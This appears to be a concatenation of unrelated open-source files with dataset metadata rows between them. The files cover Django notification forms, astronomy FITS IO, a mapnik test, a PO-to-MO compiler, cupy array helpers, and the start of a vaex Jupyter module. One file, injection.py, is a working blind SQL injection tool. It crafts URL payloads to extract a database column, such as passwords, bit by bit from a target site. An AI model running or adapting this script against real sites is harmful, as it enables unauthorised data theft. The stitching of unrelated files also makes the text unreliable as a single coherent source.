tz = forms.CharField(max_length=36, validators=[TimezoneValidator()])
grace = forms.IntegerField(min_value=1, max_value=43200)
class AddOpsgenieForm(forms.Form):
error_css_class = "has-error"
region = forms.ChoiceField(initial="us", choices=(("us", "US"), ("eu", "EU")))
key = forms.CharField(max_length=40)
PRIO_CHOICES = [
("-2", "Lowest Priority"),
("-1", "Low Priority"),
("0", "Normal Priority"),
("1", "High Priority"),
("2", "Emergency Priority"),
]
class AddPushoverForm(forms.Form):
error_css_class = "has-error"
pushover_user_key = forms.CharField()
prio = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)
prio_up = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)
def get_value(self):
key = self.cleaned_data["pushover_user_key"]
prio = self.cleaned_data["prio"]
prio_up = self.cleaned_data["prio_up"]
return "%s|%s|%s" % (key, prio, prio_up)
class AddEmailForm(forms.Form):
error_css_class = "has-error"
value = forms.EmailField(max_length=100)
down = forms.BooleanField(required=False, initial=True)
up = forms.BooleanField(required=False, initial=True)
def clean(self):
super().clean()
down = self.cleaned_data.get("down")
up = self.cleaned_data.get("up")
if not down and not up:
self.add_error("down", "Please select at least one.")
class AddUrlForm(forms.Form):
error_css_class = "has-error"
value = forms.URLField(max_length=1000, validators=[WebhookValidator()])
METHODS = ("GET", "POST", "PUT")
class WebhookForm(forms.Form):
error_css_class = "has-error"
name = forms.CharField(max_length=100, required=False)
method_down = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
body_down = forms.CharField(max_length=1000, required=False)
headers_down = HeadersField(required=False)
url_down = URLField(
max_length=1000, required=False, validators=[WebhookValidator()]
)
method_up = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
body_up = forms.CharField(max_length=1000, required=False)
headers_up = HeadersField(required=False)
url_up = forms.URLField(
max_length=1000, required=False, validators=[WebhookValidator()]
)
def clean(self):
super().clean()
url_down = self.cleaned_data.get("url_down")
url_up = self.cleaned_data.get("url_up")
if not url_down and not url_up:
if not self.has_error("url_down"):
self.add_error("url_down", "Enter a valid URL.")
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class AddShellForm(forms.Form):
error_css_class = "has-error"
cmd_down = forms.CharField(max_length=1000, required=False)
cmd_up = forms.CharField(max_length=1000, required=False)
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class PhoneNumberForm(forms.Form):
error_css_class = "has-error"
label = forms.CharField(max_length=100, required=False)
phone = forms.CharField()
def clean_phone(self):
v = self.cleaned_data["phone"]
stripped = v.encode("ascii", "ignore").decode("ascii")
stripped = stripped.replace(" ", "").replace("-", "")
if not re.match(r"^\+\d{5,15}$", stripped):
raise forms.ValidationError("Invalid phone number format.")
return stripped
def get_json(self):
return json.dumps({"value": self.cleaned_data["phone"]})
class PhoneUpDownForm(PhoneNumberForm):
up = forms.BooleanField(required=False, initial=True)
down = forms.BooleanField(required=False, initial=True)
def get_json(self):
return json.dumps(
{
"value": self.cleaned_data["phone"],
"up": self.cleaned_data["up"],
"down": self.cleaned_data["down"],
}
)
class ChannelNameForm(forms.Form):
name = forms.CharField(max_length=100, required=False)
class AddMatrixForm(forms.Form):
error_css_class = "has-error"
alias = forms.CharField(max_length=100)
def clean_alias(self):
v = self.cleaned_data["alias"]
# validate it by trying to join
url = settings.MATRIX_HOMESERVER
url += "/_matrix/client/r0/join/%s?" % quote(v)
url += urlencode({"access_token": settings.MATRIX_ACCESS_TOKEN})
r = requests.post(url, {})
if r.status_code == 429:
raise forms.ValidationError(
"Matrix server returned status code 429 (Too Many Requests), "
"please try again later."
)
doc = r.json()
if "error" in doc:
raise forms.ValidationError("Response from Matrix: %s" % doc["error"])
self.cleaned_data["room_id"] = doc["room_id"]
return v
class AddAppriseForm(forms.Form):
error_css_class = "has-error"
url = forms.CharField(max_length=512)
class AddPdForm(forms.Form):
error_css_class = "has-error"
value = forms.CharField(max_length=32)
ZULIP_TARGETS = (("stream", "Stream"), ("private", "Private"))
class AddZulipForm(forms.Form):
error_css_class = "has-error"
bot_email = forms.EmailField(max_length=100)
api_key = forms.CharField(max_length=50)
site = forms.URLField(max_length=100, validators=[WebhookValidator()])
mtype = forms.ChoiceField(choices=ZULIP_TARGETS)
to = forms.CharField(max_length=100)
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class AddTrelloForm(forms.Form):
token = forms.RegexField(regex=r"^[0-9a-fA-F]{64}$")
board_name = forms.CharField(max_length=100)
list_name = forms.CharField(max_length=100)
list_id = forms.RegexField(regex=r"^[0-9a-fA-F]{16,32}$")
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
| bsd-3-clause | 5,900,701,289,062,930,000 | 29.054795 | 88 | 0.62876 | false | 3.611523 | false | false | false |
gdhungana/desispec | py/desispec/io/fluxcalibration.py | 2 | 5653 | """
desispec.io.fluxcalibration
===========================
IO routines for flux calibration.
"""
from __future__ import absolute_import, print_function
import os
from astropy.io import fits
import numpy,scipy
from desiutil.depend import add_dependencies
from .util import fitsheader, native_endian, makepath
def write_stdstar_models(norm_modelfile,normalizedFlux,wave,fibers,data,header=None):
"""Writes the normalized flux for the best models.
Args:
norm_modelfile : output file path
normalizedFlux : 2D array of flux[nstdstars, nwave]
wave : 1D array of wavelengths[nwave] in Angstroms
fibers : 1D array of fiberids for these spectra
data : meta data table about which templates best fit; should include
BESTMODEL, TEMPLATEID, CHI2DOF, REDSHIFT
"""
hdr = fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = ('FLUX', 'erg/s/cm2/A')
hdr['BUNIT'] = ('erg/s/cm2/A', 'Flux units')
hdu1=fits.PrimaryHDU(normalizedFlux.astype('f4'), header=hdr.copy())
hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]')
hdr['BUNIT'] = ('Angstrom', 'Wavelength units')
hdu2 = fits.ImageHDU(wave.astype('f4'), header=hdr.copy())
hdr['EXTNAME'] = ('FIBERS', 'no dimension')
hdu3 = fits.ImageHDU(fibers, header=hdr.copy())
hdr['EXTNAME'] = ('METADATA', 'no dimension')
from astropy.io.fits import Column
BESTMODEL=Column(name='BESTMODEL',format='K',array=data['BESTMODEL'])
TEMPLATEID=Column(name='TEMPLATEID',format='K',array=data['TEMPLATEID'])
CHI2DOF=Column(name='CHI2DOF',format='D',array=data['CHI2DOF'])
REDSHIFT=Column(name='REDSHIFT',format='D',array=data['REDSHIFT'])
cols=fits.ColDefs([BESTMODEL,TEMPLATEID,CHI2DOF,REDSHIFT])
tbhdu=fits.BinTableHDU.from_columns(cols,header=hdr)
hdulist=fits.HDUList([hdu1,hdu2,hdu3,tbhdu])
tmpfile = norm_modelfile+".tmp"
hdulist.writeto(tmpfile, clobber=True, checksum=True)
os.rename(tmpfile, norm_modelfile)
#fits.append(norm_modelfile,cols,header=tbhdu.header)
def read_stdstar_models(filename):
"""Read stdstar models from filename.
Args:
filename (str): File containing standard star models.
Returns:
read_stdstar_models (tuple): flux[nspec, nwave], wave[nwave], fibers[nspec]
"""
with fits.open(filename, memmap=False) as fx:
flux = native_endian(fx['FLUX'].data.astype('f8'))
wave = native_endian(fx['WAVELENGTH'].data.astype('f8'))
fibers = native_endian(fx['FIBERS'].data)
return flux, wave, fibers
def write_flux_calibration(outfile, fluxcalib, header=None):
"""Writes flux calibration.
Args:
outfile : output file name
fluxcalib : FluxCalib object
Options:
header : dict-like object of key/value pairs to include in header
"""
hx = fits.HDUList()
hdr = fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = 'FLUXCALIB'
hdr['BUNIT'] = ('(electrons/A) / (erg/s/cm2/A)', 'electrons per flux unit')
hx.append( fits.PrimaryHDU(fluxcalib.calib.astype('f4'), header=hdr) )
hx.append( fits.ImageHDU(fluxcalib.ivar.astype('f4'), name='IVAR') )
hx.append( fits.CompImageHDU(fluxcalib.mask, name='MASK') )
hx.append( fits.ImageHDU(fluxcalib.wave, name='WAVELENGTH') )
hx.writeto(outfile+'.tmp', clobber=True, checksum=True)
os.rename(outfile+'.tmp', outfile)
return outfile
def read_flux_calibration(filename):
"""Read flux calibration file; returns a FluxCalib object
"""
# Avoid a circular import conflict at package install/build_sphinx time.
from ..fluxcalibration import FluxCalib
fx = fits.open(filename, memmap=False, uint=True)
calib = native_endian(fx[0].data.astype('f8'))
ivar = native_endian(fx["IVAR"].data.astype('f8'))
mask = native_endian(fx["MASK"].data)
wave = native_endian(fx["WAVELENGTH"].data.astype('f8'))
fluxcalib = FluxCalib(wave, calib, ivar, mask)
fluxcalib.header = fx[0].header
fx.close()
return fluxcalib
def read_stdstar_templates(stellarmodelfile):
"""
Reads an input stellar model file
Args:
stellarmodelfile : input filename
Returns (wave, flux, templateid, teff, logg, feh) tuple:
wave : 1D[nwave] array of wavelengths [Angstroms]
flux : 2D[nmodel, nwave] array of model fluxes
templateid : 1D[nmodel] array of template IDs for each spectrum
teff : 1D[nmodel] array of effective temperature for each model
logg : 1D[nmodel] array of surface gravity for each model
feh : 1D[nmodel] array of metallicity for each model
"""
phdu=fits.open(stellarmodelfile, memmap=False)
#- New templates have wavelength in HDU 2
if len(phdu) >= 3:
wavebins = native_endian(phdu[2].data)
#- Old templates define wavelength grid in HDU 0 keywords
else:
hdr0=phdu[0].header
crpix1=hdr0['CRPIX1']
crval1=hdr0['CRVAL1']
cdelt1=hdr0['CDELT1']
if hdr0["LOGLAM"]==1: #log bins
wavebins=10**(crval1+cdelt1*numpy.arange(len(phdu[0].data[0])))
else: #lin bins
            model_wave_step = cdelt1
            model_wave_offset = (crval1-cdelt1*(crpix1-1))
            # fix: n_model_wave was undefined in the original; derive it from the flux array
            n_model_wave = len(phdu[0].data[0])
            wavebins = model_wave_step*numpy.arange(n_model_wave) + model_wave_offset
paramData=phdu[1].data
templateid=paramData["TEMPLATEID"]
teff=paramData["TEFF"]
logg=paramData["LOGG"]
feh=paramData["FEH"]
fluxData=native_endian(phdu[0].data)
phdu.close()
return wavebins,fluxData,templateid,teff,logg,feh
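# --- Editor-added usage sketch (not part of the original module) ---------------
# Illustrative only: the file paths below are placeholders, not shipped data.
if __name__ == '__main__':
    _model_file = 'stdstar_templates.fits'        # hypothetical path
    _calib_file = 'fluxcalib-r0-00000000.fits'    # hypothetical path
    wave, flux, templateid, teff, logg, feh = read_stdstar_templates(_model_file)
    print('read {} stellar templates over {} wavelength bins'.format(
        len(templateid), len(wave)))
    fluxcalib = read_flux_calibration(_calib_file)
    print('flux calibration covers {:.1f}-{:.1f} Angstrom'.format(
        fluxcalib.wave[0], fluxcalib.wave[-1]))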
| bsd-3-clause | -3,059,710,040,801,416,000 | 34.553459 | 85 | 0.656112 | false | 3.248851 | false | false | false |
the-useless-one/blind_injection | injection.py | 1 | 2562 | #!/usr/bin/env python3
#
# -*- coding: utf8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2014 Yannick Méheut <useless (at) utouch (dot) fr>
import sys
import requests
def injection(target_url, string, column, table, where, index):
    '''
    Perform the blind injection, recovering each character of the target data bit by bit.
    * target_url: the URL where the injection will be performed
    * string: the text whose presence in the response marks a "true" (1) bit
    * column: the column to extract
    * table: the table to select from
    * where: an optional WHERE clause (may be empty)
    * index: the row offset used in the LIMIT clause
    The function will return the extracted data.
    '''
print('[wait] retrieving data:', end='\t')
sys.stdout.flush()
data = ''
i = 1
# While we don't have the entire password
while True:
char = 0
for j in range(1,8):
# The injection performed here is URL-based
# To use another mean of injection (HTTP Headers, Cookies...)
# change the crafting between the hashtags
#### CHANGE HERE
if '?' in target_url:
separator = '&'
else:
separator = '?'
url = target_url + separator + "u=' OR " + \
"(select mid(lpad(bin(ord(mid({0},{1},1))),7,'0'),{2},1) " + \
"from {3} {4} " + \
"limit {5},1) = 1;-- &p=bla"
url = url.format(column, i, j, table, where, index)
r = requests.get(url)
#### END OF CHANGE
output = r.text
            # If the probe string is present, bit j of the current character
            # is 1, so add its value (j == 1 is the most significant bit)
if string in output:
char += 2**(6 - j + 1)
if char != 0:
# When we find a character, we display it on stdout
print(chr(char), end='')
sys.stdout.flush()
# We add it to the existing data
data += chr(char)
i += 1
else:
break
print('\r[done]')
return data
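# --- Editor-added usage sketch (not part of the original script) ---------------
# Illustrative only: the URL, probe string, table and column names are hypothetical.
if __name__ == '__main__':
    extracted = injection(
        target_url="http://victim.example/index.php?id=1",
        string="Welcome back",      # text shown when the injected condition is true
        column="password",
        table="users",
        where="where username='admin'",
        index=0)
    print("extracted value: {}".format(extracted))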
| gpl-3.0 | 5,222,827,028,218,631,000 | 30.617284 | 82 | 0.570871 | false | 4.033071 | false | false | false |
h4ck3rm1k3/MapNickAutotools | tests/python_tests/load_map_test.py | 1 | 1395 | #!/usr/bin/env python
from nose.tools import *
from utilities import execution_path
import os, sys, glob, mapnik
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
# We expect these files to not raise any
# exceptions at all
def assert_loads_successfully(file):
m = mapnik.Map(512, 512)
strict = True
mapnik.load_map(m, file, strict)
# libxml2 is not smart about paths, and clips the last directory off
# of a path if it does not end in a trailing slash
base_path = os.path.dirname(file) + '/'
mapnik.load_map_from_string(m,open(file,'rb').read(),strict,base_path)
# We expect these files to raise a RuntimeError
# and fail if there isn't one (or a different type
# of exception)
@raises(RuntimeError)
def assert_raises_runtime_error(file):
m = mapnik.Map(512, 512)
strict = True
mapnik.load_map(m, file, strict)
def test_broken_files():
broken_files = glob.glob("../data/broken_maps/*.xml")
# Add a filename that doesn't exist
broken_files.append("../data/broken/does_not_exist.xml")
for file in broken_files:
yield assert_raises_runtime_error, file
def test_good_files():
good_files = glob.glob("../data/good_maps/*.xml")
for file in good_files:
yield assert_loads_successfully, file
| lgpl-2.1 | -6,521,023,405,738,516,000 | 26.9 | 74 | 0.676703 | false | 3.4875 | false | false | false |
rdio/translate-toolkit | tools/pocompile.py | 3 | 3220 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2005, 2006,2010 Zuza Software Foundation
#
# This file is part of the translate-toolkit
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with translate; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Compile XLIFF and Gettext PO localization files into Gettext MO (Machine Object) files
See: http://translate.sourceforge.net/wiki/toolkit/pocompile for examples and
usage instructions
"""
from translate.storage import factory
from translate.storage import mo
from translate.misc.multistring import multistring
def _do_msgidcomment(string):
return u"_: %s\n" % string
class POCompile:
def convertstore(self, inputfile, includefuzzy=False):
outputfile = mo.mofile()
for unit in inputfile.units:
if unit.istranslated() or (unit.isfuzzy() and includefuzzy and unit.target) or unit.isheader():
mounit = mo.mounit()
if unit.isheader():
mounit.source = ""
else:
mounit.source = unit.source
context = unit.getcontext()
if unit.msgidcomment:
if mounit.hasplural():
mounit.source = multistring(_do_msgidcomment(unit.msgidcomment) + mounit.source, *mounit.source.strings[1:])
else:
mounit.source = _do_msgidcomment(unit.msgidcomment) + mounit.source
elif context:
mounit.msgctxt = [context]
mounit.target = unit.target
outputfile.addunit(mounit)
return str(outputfile)
def convertmo(inputfile, outputfile, templatefile, includefuzzy=False):
"""reads in a base class derived inputfile, converts using pocompile, writes to outputfile"""
# note that templatefile is not used, but it is required by the converter...
inputstore = factory.getobject(inputfile)
if inputstore.isempty():
return 0
convertor = POCompile()
outputmo = convertor.convertstore(inputstore, includefuzzy)
# We have to make sure that we write the files in binary mode, therefore we
# reopen the file accordingly
outputfile.close()
outputfile = open(outputfile.name, 'wb')
outputfile.write(outputmo)
return 1
def main():
from translate.convert import convert
formats = {"po": ("mo", convertmo), "xlf": ("mo", convertmo)}
parser = convert.ConvertOptionParser(formats, usepots=False, description=__doc__)
parser.add_fuzzy_option()
parser.run()
if __name__ == '__main__':
main()
| gpl-2.0 | 2,589,526,101,237,635,000 | 36.44186 | 136 | 0.659938 | false | 4.154839 | false | false | false |
chengdh/openerp-ktv | openerp/addons/ktv_sale/ktv_helper.py | 1 | 5772 | # -*- coding: utf-8 -*-
from osv import fields
from datetime import date,datetime,time
import logging
_logger = logging.getLogger(__name__)
# Time period choices for selection fields
def time_for_selection(self,cr,uid,context = None):
ret = [("%02i:00" % i,"%02i时30分" % i) for i in range(24)] + [("%02i:30" % i,"%02i时00分" % (i+1)) for i in range(24)]
ret.sort()
ret.pop()
ret.append(("23:59","23时59分"))
return ret
# Price list choices
def price_list_for_selection(self,cr,uid,context = None):
ret =[("ting_price","大厅价"),("room_price","包厢价"),("member_price","会员价"),("vip_price","贵宾价"),("a_price","A类价"),("b_price","B类价")]
return ret
# Room state definitions
def room_states_for_selection(self,cr,uid,context = None):
ret =[("free","空闲"),("in_use","使用"),("scheduled","预定"),("locked","锁定"),("checkout","已结账"),("buyout","买断"),("buytime","买钟"),("malfunction","故障"),("clean","清洁"),("debug","调试"),("visit","带客")]
return ret
# Gender choices
def sexes_for_select(self,cr,uid,context = None):
ret=[("F","女"),("M","男")]
return ret
# ID document type choices
def id_types_for_select(self,cr,uid,context = None):
ret=[(1,"身份证"),(2,"驾驶证"),(3,"其他证件")]
return ret
# Return the weekday abbreviation for 0-6 (mon=0 ... sun=6)
def weekday_str(weekday_int):
weekday_dict = {
0 : 'mon',
1 : 'tue',
2 : 'wed',
3 : 'thu',
4 : 'fri',
5 : 'sat',
6 : 'sun'
}
return weekday_dict[weekday_int]
def current_user_tz(obj,cr,uid,context = None):
"""
获取当前登录用户的时区设置
:param cursor cr 数据库游标
:params integer uid 当前登录用户id
"""
the_user = obj.pool.get('res.users').read(cr,uid,uid,['id','context_tz','name'])
return the_user['context_tz']
def user_context_now(obj,cr,uid):
"""
获取当前登录用户的本地日期时间
:return 本地化的当前日期
"""
tz = current_user_tz(obj,cr,uid)
context_now = fields.datetime.context_timestamp(cr,uid,datetime.now(),{"tz" : tz})
return context_now
def minutes_delta(time_from,time_to):
    '''
    Compute the difference in minutes between two given times.
    :param time_from: string of the form '09:30', the start time
    :param time_to: string of the form '09:30', the end time
    :return: integer number of minutes between the two times
    '''
array_time_from = [int(a) for a in time_from.split(':')]
array_time_to = [int(a) for a in time_to.split(':')]
t1 = time(array_time_from[0],array_time_from[1])
t2 = time(array_time_to[0],array_time_to[1])
return (t2.hour - t1.hour)*60 + (t2.minute - t1.minute)
def context_now_minutes_delta(obj,cr,uid,time_to):
    '''
    Compute the minutes from the current time to the given time, evaluated
    in the timezone of the currently logged-in user.
    :param object obj: osv object
    :param cursor cr: database cursor
    :param integer uid: id of the currently logged-in user
    :param string time_to: target time
    :return: integer number of minutes between now and time_to
    '''
context_now = user_context_now(obj,cr,uid)
return minutes_delta(context_now.strftime("%H:%M"),time_to)
def context_strptime(osv_obj,cr,uid,str_time):
    '''
    Convert the given time string into a datetime on the current day, using
    the timezone of the currently logged-in user as the reference.
    :param osv_obj: osv database object
    :param cr: db cursor
    :param int uid: id of the currently logged-in user
    :param str_time: time string of the form '09:30'
    :return datetime: the computed datetime object
    '''
context_now = user_context_now(osv_obj,cr,uid)
time_array = [int(a) for a in str_time.split(":")]
ret = context_now.replace(hour=time_array[0],minute=time_array[1])
return ret
def str_to_today_time(time):
    '''
    Convert the given string into a datetime on the current day.
    :params time: time string of the form 09:30:00
    :return: datetime whose date is today and whose time is the given value
    '''
now = datetime.now()
array_time = [int(a) for a in time.split(':')]
ret = now.replace(hour=array_time[0],minute = array_time[1],second = array_time[2])
return ret
def utc_time_between(str_time_from,str_time_to,str_cur_time):
"""
判断给定的时间字符串是否在给定的时间区间内
由于对时间统一采用UTC时间保存,可能存在time_to < time_from的情况
:params string str_time_from 形式类似 09:10的时间字符串
:params string str_time_to 形式类似 09:10的时间字符串
:params str_cur_time 要比较的时间字符串
:return True 在范围内 else False
"""
if str_time_to > str_time_from:
return str_cur_time >= str_time_from and str_cur_time <= str_time_to
else:
        # If time_from is later than time_to, the interval spans midnight
return (str_cur_time >= str_time_from and str_cur_time < '23:59:59') or (str_cur_time >='00:00:00' and str_cur_time <= str_time_to)
def calculate_present_minutes(buy_minutes,promotion_buy_minutes = 0,promotion_present_minutes = 0):
"""
根据给定的参数计算赠送时长
买钟时间(分钟数) / 设定买钟时长(分钟数) * 赠送时长
:params buy_minutes integer 买钟时间
:params promotion_buy_minutes integer 买钟优惠设置中设定的买钟时长
:params promotion_present_minutes integer 买钟优惠设置中设定的赠送时长
:return integer 赠送时长
"""
#如果未设置优惠信息,则不赠送,直接返回买钟时间
if not promotion_buy_minutes:
return buy_minutes
present_minutes = buy_minutes / promotion_buy_minutes * promotion_present_minutes
return present_minutes
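# --- Editor-added usage sketch (not part of the original module) ---------------
# Quick sanity check of the pure helper functions; the values are arbitrary examples.
if __name__ == '__main__':
    print(minutes_delta('09:30', '11:45'))                        # 135
    print(utc_time_between('22:00:00', '02:00:00', '23:30:00'))   # True (interval spans midnight)
    print(calculate_present_minutes(120, 60, 10))                 # 20 gift minutes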
| agpl-3.0 | -5,257,962,662,141,587,000 | 31.951049 | 193 | 0.627547 | false | 2.164446 | false | false | false |
Arcturus314/cansat2017 | CanSat/control.py | 1 | 6550 | import datastore
import timed_input
import packet
import datalogger
import multiprocessing
import position
import time
start_data = False
input_timeout = 3 #3 seconds to wait for response
num_packets = 0
num_failures = 0
init_time = time.time()
print "init_time: ",
print init_time
in_packet = ("",False)
def t_input_actual(message):
global in_packet
in_data = ""
try:
in_data = str(timed_input.nonBlockingRawInput(message,input_timeout))
print "received: ",
print in_data
in_packet = in_data, True
return in_packet
except EOFError, err:
pass
return in_data
def t_input(message):
return ""
#packet takes form
#":,(id),|(message)|checksum"
#id:
# 0: custom data packet
# 1: change settings
# 2: request all current sensor data
# 3: request all env logging data
# 4: request all position tracking data
# 5: request all heat map data
# 6: request all stored heat map data
# 7: request all stored sensor data
# 8: request all error data
#message:
# 0: for id 2-7
# sensor_id,setting,value;...: for id 1
# sensor_id: 0 accel,1 mag,2 gyro,3, gsm
# setting: 0 power,1 update,2 full scale deflection
# value: 0 false, 1 true
# _,_,_,_,_,_,_;_,_,_,_,_,_,_;_;_;_;_: for custom packet- ind_data,inc_all_data,error,pos,mat,map
#checksum: see method
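#example packets (editor-added illustration; checksum values are arbitrary):
#  ":,2,|0|42" requests all current sensor data
#  ":,1,|0,0,0|17" powers down the accelerometer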
def parse_packet(packet):
global num_packets,num_failures
num_packets = num_packets + 1
try:
t_packet = packet.split(":")[1] #identifying packet by initial ':'
p_packet = t_packet.split("|") #splitting packet into header,body,and footer, separated by '|'
header = int(p_packet[0].split(",")[1]) #extracting identifier int from header
body = p_packet[1]
footer = int(p_packet[2])
return header,body,footer
except:
num_failures = num_failures+1
sms_malformed_packet()
return -1
def sms_malformed_packet(): #texts home in case of malformed packet
return None
def parse_body(header,body):
    global num_packets, num_failures  # num_failures is also assigned in the except blocks below
checksum_contribution = 0
try:
if header==0: #custom data packet
packet_settings = body.split(";")
inc_data = packet_settings[0]
inc_all_data = packet_settings[1]
inc_error = packet_settings[2]
inc_pos = packet_settings[3]
inc_mat = packet_settings[4]
inc_map = packet_settings[5]
packet.init_packet(inc_data,inc_all_data,inc_error,inc_pos,inc_mat,inc_map)
send_packet(packet.build_packet())
if header==1:
settings_list = body.split(";")
for setting in settings_list:
power = True
update = True
deflection = True
if setting[0] == 0: #accelerometer
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_accelerometer_settings(power, update, deflection)
if setting[0] == 1: #magnetometer
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_magnetometer_settings(power, update, deflection)
if setting[0] == 2: #gyroscope
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_gyroscope_settings(power, update, deflection)
if setting[0] == 3: #sim800l
if setting[1] == 0:
if setting[2] == 0:
power = False
                            return_ready()  # fixed: the original called undefined return_read()
if header==2:
packet.init_packet_type(1)
send_packet(packet.build_packet())
if header==3:
packet.init_packet_type(2)
send_packet(packet.build_packet())
if header==4:
packet.init_packet_type(3)
send_packet(packet.build_packet())
if header==5:
packet.init_packet_type(4)
send_packet(packet.build_packet())
if header==6:
packet.init_packet_type(5)
send_packet(packet.build_packet())
if header==7:
packet.init_packet_type(6)
send_packet(packet.build_packet())
if header==8:
packet.init_packet_type(7)
send_packet(packet.build_packet())
return 1
except:
num_failures = num_failures+1
sms_malformed_packet()
return -1
def send_packet(packet):
print packet
def return_ready():
print "ready"
def overall_control():
global in_packet
while True:
#tall = time.time()
if in_packet[1] == False:
t_input("")
if in_packet[1] == True:
parsed_packet = parse_packet(in_packet[0])
if parsed_packet != -1:
#t = time.time()
                parse_body(parsed_packet[0], parsed_packet[1])  # fixed: build_packet() is undefined at module level; parse_body builds and sends the response
#print "build packet time",
#print time.time()-t
send_packet(packet.build_packet())
#print "total time",
#print time.time()-tall
#Actual code execution
return_ready() #ready returned on startup
datastore.setTime(init_time)
position.setTime(init_time)
#Control process manages overall packetization / communicatio with the base station
#Logger process independently manages data logging and recording to files
if __name__ == '__main__':
control = multiprocessing.Process(target=overall_control)
logger = multiprocessing.Process(target=datalogger.add_all_inf)
control.start()
logger.start()
| gpl-3.0 | -2,134,036,573,260,997 | 31.914573 | 103 | 0.52687 | false | 3.969697 | false | false | false |
hidenori-t/chainer | cupy/carray.py | 9 | 1722 | import ctypes
import os
import six
from cupy import cuda
MAX_NDIM = 25
def _make_carray(n):
class CArray(ctypes.Structure):
_fields_ = (('data', ctypes.c_void_p),
('size', ctypes.c_int),
('shape', ctypes.c_int * n),
('strides', ctypes.c_int * n))
return CArray
_carrays = [_make_carray(i) for i in six.moves.range(MAX_NDIM)]
def to_carray(data, size, shape, strides):
return _carrays[len(shape)](data, size, shape, strides)
def _make_cindexer(n):
class CIndexer(ctypes.Structure):
_fields_ = (('size', ctypes.c_int),
('shape', ctypes.c_int * n),
('index', ctypes.c_int * n))
return CIndexer
_cindexers = [_make_cindexer(i) for i in six.moves.range(MAX_NDIM)]
def to_cindexer(size, shape):
return _cindexers[len(shape)](size, shape, (0,) * len(shape))
class Indexer(object):
def __init__(self, shape):
size = 1
for s in shape:
size *= s
self.shape = shape
self.size = size
@property
def ndim(self):
return len(self.shape)
@property
def ctypes(self):
return to_cindexer(self.size, self.shape)
_header_source = None
def _get_header_source():
global _header_source
if _header_source is None:
header_path = os.path.join(os.path.dirname(__file__), 'carray.cuh')
with open(header_path) as header_file:
_header_source = header_file.read()
return _header_source
def compile_with_cache(source, options=(), arch=None, cache_dir=None):
    source = _get_header_source() + source
    return cuda.compile_with_cache(source, options, arch, cache_dir)
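# --- Editor-added usage sketch (not part of the original module) ---------------
# Indexer and the ctypes structures are host-side helpers, so this runs without a GPU.
if __name__ == '__main__':
    idx = Indexer((3, 4))
    print('ndim=%d size=%d' % (idx.ndim, idx.size))   # ndim=2 size=12
    cidx = idx.ctypes
    print('shape=%s' % (list(cidx.shape),))           # shape=[3, 4]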
| mit | -2,818,954,360,372,897,000 | 22.27027 | 75 | 0.585947 | false | 3.311538 | false | false | false |
maartenbreddels/vaex | packages/vaex-jupyter/vaex/jupyter/__init__.py | 1 | 10408 | # -*- coding: utf-8 -*-
import os
import logging
import time
from .utils import debounced, flush, gather, kernel_tick, interactive_selection, interactive_cleanup # noqa
import vaex
import IPython.display
base_path = os.path.dirname(__file__)
logger = logging.getLogger("vaex.jupyter")
def _add_toolbar(viz):
from .widgets import ToolsToolbar, tools_items_default
from traitlets import link
interact_items = [k for k in tools_items_default if k['value'] in viz.TOOLS_SUPPORTED]
toolbar = ToolsToolbar(supports_transforms=viz.supports_transforms,
supports_normalize=viz.supports_normalize,
interact_items=interact_items)
viz.children = [toolbar, ] + viz.children
link((viz, 'tool'), (toolbar, 'interact_value'))
link((viz, 'transform'), (toolbar, 'transform_value'))
link((viz, 'normalize'), (toolbar, 'normalize'))
link((viz, 'selection_mode'), (toolbar, 'selection_mode'))
return toolbar
class DataFrameAccessorWidget(object):
def __init__(self, df):
self.df = df
import vaex.jupyter.grid
self.grid = vaex.jupyter.model.GridCalculator(df, [])
self._last_grid = None
@debounced(delay_seconds=0.1, reentrant=False)
async def execute_debounced(self):
"""Schedules an execution of dataframe tasks in the near future (debounced)."""
try:
logger.debug("Execute tasks... tasks=%r", self.df.executor.tasks)
await self.df.execute_async()
logger.debug("Execute tasks done")
except vaex.execution.UserAbort:
pass # this is fine
except Exception:
logger.exception("Error while executing tasks")
def clear(self):
self.grid = vaex.jupyter.model.GridCalculator(self.df, [])
def data_array(self, axes=[], selection=None, shared=False, display_function=IPython.display.display, **kwargs):
        '''Create a :class:`vaex.jupyter.model.DataArray` model and :class:`vaex.jupyter.view.DataArray` widget and link them.
This is a convenience method to create the model and view, and hook them up.
'''
import vaex.jupyter.model
import vaex.jupyter.view
